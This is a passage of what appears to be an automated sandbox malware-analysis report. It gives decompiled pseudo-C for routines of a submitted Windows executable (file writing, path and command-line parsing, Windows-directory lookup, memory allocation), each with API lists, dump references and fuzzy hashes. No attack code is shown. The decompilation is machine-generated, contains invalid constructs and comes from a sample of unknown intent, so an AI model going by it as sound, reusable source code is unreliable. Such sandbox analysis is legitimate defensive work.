                                                                                                                                                                                                                                                					_t12 = WriteFile( *(0x58d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                                					if(_t12 != 0) {
                                                                                                                                                                                                                                                						_t25 = _a12;
                                                                                                                                                                                                                                                						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                							_t14 =  *0x59400; // 0xf7c60
                                                                                                                                                                                                                                                							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                                							 *0x59400 = _t15;
                                                                                                                                                                                                                                                							if( *0x58184 != 0) {
                                                                                                                                                                                                                                                								_t21 =  *0x58584; // 0x0
                                                                                                                                                                                                                                                								if(_t21 != 0) {
                                                                                                                                                                                                                                                									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x593f8, 0);
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					return _t25;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00053680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0005369F
                                                                                                                                                                                                                                                  • Part of subcall function 00053680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000536B2
                                                                                                                                                                                                                                                  • Part of subcall function 00053680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000536DA
                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00054B05
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1084409-0
                                                                                                                                                                                                                                                • Opcode ID: 50436bfe1aa1575a535518efe91f7ebf676e93d878ac3065b7657f33f51fafc8
                                                                                                                                                                                                                                                • Instruction ID: 8aa0e01e7243996bcbf2abc9c6df6bcae32382bd7ed8218986ef77164edd4921
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50436bfe1aa1575a535518efe91f7ebf676e93d878ac3065b7657f33f51fafc8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83016D71200301ABEB548F58DC15BE77799A74472BF148225ED39AB1E0DB78D855CB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E0005658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                                				intOrPtr _t4;
                                                                                                                                                                                                                                                				char* _t6;
                                                                                                                                                                                                                                                				char* _t8;
                                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                                				char* _t16;
                                                                                                                                                                                                                                                				intOrPtr* _t17;
                                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                                				char* _t19;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t16 = __ecx;
                                                                                                                                                                                                                                                				_t10 = __edx;
                                                                                                                                                                                                                                                				_t17 = __ecx;
                                                                                                                                                                                                                                                				_t1 = _t17 + 1; // 0x58b3f
                                                                                                                                                                                                                                                				_t12 = _t1;
                                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                                					_t4 =  *_t17;
                                                                                                                                                                                                                                                					_t17 = _t17 + 1;
                                                                                                                                                                                                                                                				} while (_t4 != 0);
                                                                                                                                                                                                                                                				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                                				_t2 = _t18 + 1; // 0x58b40
                                                                                                                                                                                                                                                				if(_t2 < __edx) {
                                                                                                                                                                                                                                                					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                                					if(_t19 > __ecx) {
                                                                                                                                                                                                                                                						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                                						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                                							 *_t19 = 0x5c;
                                                                                                                                                                                                                                                							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t6 = _a4;
                                                                                                                                                                                                                                                					 *_t19 = 0;
                                                                                                                                                                                                                                                					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                                						_t6 = _t6 + 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					return E000516B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return 0x8007007a;
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharPrevA.USER32(00058B3E,00058B3F,00000001,00058B3E,-00000003,?,000560EC,00051140,?), ref: 000565BA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharPrev
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 122130370-0
                                                                                                                                                                                                                                                • Opcode ID: 3bf139d9f821647bc6796b603fadd037fa53ab2d118a8d96a16b2dc770137876
                                                                                                                                                                                                                                                • Instruction ID: d4650c37fbe090db3e7e7ee27b19497f5ecd752b520c5f548c3b5a76769c5ca6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3bf139d9f821647bc6796b603fadd037fa53ab2d118a8d96a16b2dc770137876
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16F042321447509BE331051D9884BA7BFDD9B86352F54015EECDAC3205EA574D4D83A4
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E0005621E() {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				signed int _t5;
                                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				signed int _t21;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t5 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                                				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                                					0x4f0 = 2;
                                                                                                                                                                                                                                                					_t9 = E0005597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					E000544B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                                					 *0x59124 = E00056285();
                                                                                                                                                                                                                                                					_t9 = 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00056CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                                			}











                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0005623F
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                  • Part of subcall function 00056285: GetLastError.KERNEL32(00055BBC), ref: 00056285
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 381621628-0
                                                                                                                                                                                                                                                • Opcode ID: a5f59f93b91628f5424284c191708ec4220510be2090a61c397bfb6e1d0ed935
                                                                                                                                                                                                                                                • Instruction ID: b4c998543d396857e4a94e26d7a2e4741bbbdeae099c37621a1ea0565c1d1e5f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5f59f93b91628f5424284c191708ec4220510be2090a61c397bfb6e1d0ed935
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10F0B470700308ABEB90EB748D06BFF36ACDB44302F800069AD85D7082DD799D488750
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00054B60(signed int _a4) {
                                                                                                                                                                                                                                                				signed int _t9;
                                                                                                                                                                                                                                                				signed int _t15;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                                				if( *((intOrPtr*)(_t15 + 0x58d64)) != 1) {
                                                                                                                                                                                                                                                					_t7 = _t15 + 0x58d74; // 0x3550cd44, executed
                                                                                                                                                                                                                                                					_t9 = FindCloseChangeNotification( *_t7); // executed
                                                                                                                                                                                                                                                					if(_t9 == 0) {
                                                                                                                                                                                                                                                						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *((intOrPtr*)(_t15 + 0x58d60)) = 1;
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t15 + 0x58d60)) = 1;
                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t15 + 0x58d68)) = 0;
                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t15 + 0x58d70)) = 0;
                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t15 + 0x58d6c)) = 0;
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(3550CD44,00000000,00000000,?,00054FA1,00000000), ref: 00054B98
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                                                                                                                • Opcode ID: 71c6dcb61996268ec4bde2493460705c436e4eec57eaa4aa842ba723fe7f8f12
                                                                                                                                                                                                                                                • Instruction ID: af992d4b4d168962fa52cf8b2d7474c8b29600b426586a928a47fdfd6dd78b02
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71c6dcb61996268ec4bde2493460705c436e4eec57eaa4aa842ba723fe7f8f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7F01231500B089E57718F3BCC016D7BBF4EB95363310992E9C6EE21D0EB30A445CBA0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000566AE(CHAR* __ecx) {
                                                                                                                                                                                                                                                				unsigned int _t1;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                                				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                                					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,00054777,?,00054E38,?), ref: 000566B1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                • Opcode ID: c481236b8759b52b2592e891fa4995ad700d22b52d4ac2345f8bf224ef79191e
                                                                                                                                                                                                                                                • Instruction ID: 5650797b73414f5b83d536e4064d9d45c23c1ec0856db9060828f11de816b0c5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c481236b8759b52b2592e891fa4995ad700d22b52d4ac2345f8bf224ef79191e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6B09276232541426A6006316C2955B2881E7C233B7E42B90F032C12E0CA3ED84AD004
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00054CA0(long _a4) {
                                                                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                                0x00054caa
                                                                                                                                                                                                                                                0x00054cb1

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000000,?), ref: 00054CAA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocGlobal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                                                                                                                                • Opcode ID: b6bfcf21a8ce19faabca06939923736b28c3216a4a31b44b07daf00fdcd25bae
                                                                                                                                                                                                                                                • Instruction ID: bf15e89b5beaf2a0fe3b8389d0b96b30838cf77a58bd82ebf27a3bdeb1e89ccb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6bfcf21a8ce19faabca06939923736b28c3216a4a31b44b07daf00fdcd25bae
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82B0123214430CB7DF001FC2EC09F873F1DE7C5762F140000F60C450908A7694108696
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00054CC0(void* _a4) {
                                                                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                                0x00054cc8
                                                                                                                                                                                                                                                0x00054ccf

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeGlobal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2979337801-0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                			E00055C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                                				CHAR* _v265;
                                                                                                                                                                                                                                                				char _v266;
                                                                                                                                                                                                                                                				char _v267;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				CHAR* _v272;
                                                                                                                                                                                                                                                				char _v276;
                                                                                                                                                                                                                                                				signed int _v296;
                                                                                                                                                                                                                                                				char _v556;
                                                                                                                                                                                                                                                				signed int _t61;
                                                                                                                                                                                                                                                				int _t63;
                                                                                                                                                                                                                                                				char _t67;
                                                                                                                                                                                                                                                				CHAR* _t69;
                                                                                                                                                                                                                                                				signed int _t71;
                                                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                                                				char _t79;
                                                                                                                                                                                                                                                				void* _t83;
                                                                                                                                                                                                                                                				void* _t85;
                                                                                                                                                                                                                                                				void* _t87;
                                                                                                                                                                                                                                                				intOrPtr _t88;
                                                                                                                                                                                                                                                				void* _t100;
                                                                                                                                                                                                                                                				intOrPtr _t101;
                                                                                                                                                                                                                                                				CHAR* _t104;
                                                                                                                                                                                                                                                				intOrPtr _t105;
                                                                                                                                                                                                                                                				void* _t111;
                                                                                                                                                                                                                                                				void* _t115;
                                                                                                                                                                                                                                                				CHAR* _t118;
                                                                                                                                                                                                                                                				void* _t119;
                                                                                                                                                                                                                                                				void* _t127;
                                                                                                                                                                                                                                                				CHAR* _t129;
                                                                                                                                                                                                                                                				void* _t132;
                                                                                                                                                                                                                                                				void* _t142;
                                                                                                                                                                                                                                                				signed int _t143;
                                                                                                                                                                                                                                                				CHAR* _t144;
                                                                                                                                                                                                                                                				void* _t145;
                                                                                                                                                                                                                                                				void* _t146;
                                                                                                                                                                                                                                                				void* _t147;
                                                                                                                                                                                                                                                				void* _t149;
                                                                                                                                                                                                                                                				char _t155;
                                                                                                                                                                                                                                                				void* _t157;
                                                                                                                                                                                                                                                				void* _t162;
                                                                                                                                                                                                                                                				void* _t163;
                                                                                                                                                                                                                                                				char _t167;
                                                                                                                                                                                                                                                				char _t170;
                                                                                                                                                                                                                                                				CHAR* _t173;
                                                                                                                                                                                                                                                				void* _t177;
                                                                                                                                                                                                                                                				intOrPtr* _t183;
                                                                                                                                                                                                                                                				intOrPtr* _t192;
                                                                                                                                                                                                                                                				CHAR* _t199;
                                                                                                                                                                                                                                                				void* _t200;
                                                                                                                                                                                                                                                				CHAR* _t201;
                                                                                                                                                                                                                                                				void* _t205;
                                                                                                                                                                                                                                                				void* _t206;
                                                                                                                                                                                                                                                				int _t209;
                                                                                                                                                                                                                                                				void* _t210;
                                                                                                                                                                                                                                                				void* _t212;
                                                                                                                                                                                                                                                				void* _t213;
                                                                                                                                                                                                                                                				CHAR* _t218;
                                                                                                                                                                                                                                                				intOrPtr* _t219;
                                                                                                                                                                                                                                                				intOrPtr* _t220;
                                                                                                                                                                                                                                                				signed int _t221;
                                                                                                                                                                                                                                                				signed int _t223;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t173 = __ecx;
                                                                                                                                                                                                                                                				_t61 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                                				_push(__ebx);
                                                                                                                                                                                                                                                				_push(__esi);
                                                                                                                                                                                                                                                				_push(__edi);
                                                                                                                                                                                                                                                				_t209 = 1;
                                                                                                                                                                                                                                                				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                                					_t63 = 1;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                                					while(_t209 != 0) {
                                                                                                                                                                                                                                                						_t67 =  *_t173;
                                                                                                                                                                                                                                                						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                                							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_v272 = _t173;
                                                                                                                                                                                                                                                						if(_t67 == 0) {
                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t69 = _v272;
                                                                                                                                                                                                                                                							_t177 = 0;
                                                                                                                                                                                                                                                							_t213 = 0;
                                                                                                                                                                                                                                                							_t163 = 0;
                                                                                                                                                                                                                                                							_t202 = 1;
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								if(_t213 != 0) {
                                                                                                                                                                                                                                                									if(_t163 != 0) {
                                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										goto L21;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t69 =  *_t69;
                                                                                                                                                                                                                                                									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t69 = _v272;
                                                                                                                                                                                                                                                										L21:
                                                                                                                                                                                                                                                										_t155 =  *_t69;
                                                                                                                                                                                                                                                										if(_t155 != 0x22) {
                                                                                                                                                                                                                                                											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                                												goto L106;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                                												_t177 = _t177 + 1;
                                                                                                                                                                                                                                                												_t202 = _t202 + 1;
                                                                                                                                                                                                                                                												_t157 = 1;
                                                                                                                                                                                                                                                												goto L30;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                                												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                                													L106:
                                                                                                                                                                                                                                                													_t63 = 0;
                                                                                                                                                                                                                                                													L125:
                                                                                                                                                                                                                                                													_pop(_t210);
                                                                                                                                                                                                                                                													_pop(_t212);
                                                                                                                                                                                                                                                													_pop(_t162);
                                                                                                                                                                                                                                                													return E00056CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                                													_t177 = _t177 + 1;
                                                                                                                                                                                                                                                													_t202 = _t202 + 1;
                                                                                                                                                                                                                                                													_t157 = 2;
                                                                                                                                                                                                                                                													goto L30;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												_t157 = 1;
                                                                                                                                                                                                                                                												if(_t213 != 0) {
                                                                                                                                                                                                                                                													_t163 = 1;
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													_t213 = 1;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												goto L30;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L131;
                                                                                                                                                                                                                                                								L30:
                                                                                                                                                                                                                                                								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                                								_t69 = _v272;
                                                                                                                                                                                                                                                							} while ( *_t69 != 0);
                                                                                                                                                                                                                                                							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                                								E00056E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                                								asm("int3");
                                                                                                                                                                                                                                                								_push(_t221);
                                                                                                                                                                                                                                                								_t222 = _t223;
                                                                                                                                                                                                                                                								_t71 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                                								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                                									0x4f0 = 2;
                                                                                                                                                                                                                                                									_t75 = E0005597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									E000544B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                                									 *0x59124 = E00056285();
                                                                                                                                                                                                                                                									_t75 = 0;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								return E00056CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                                								if(_t213 == 0) {
                                                                                                                                                                                                                                                									if(_t163 != 0) {
                                                                                                                                                                                                                                                										goto L34;
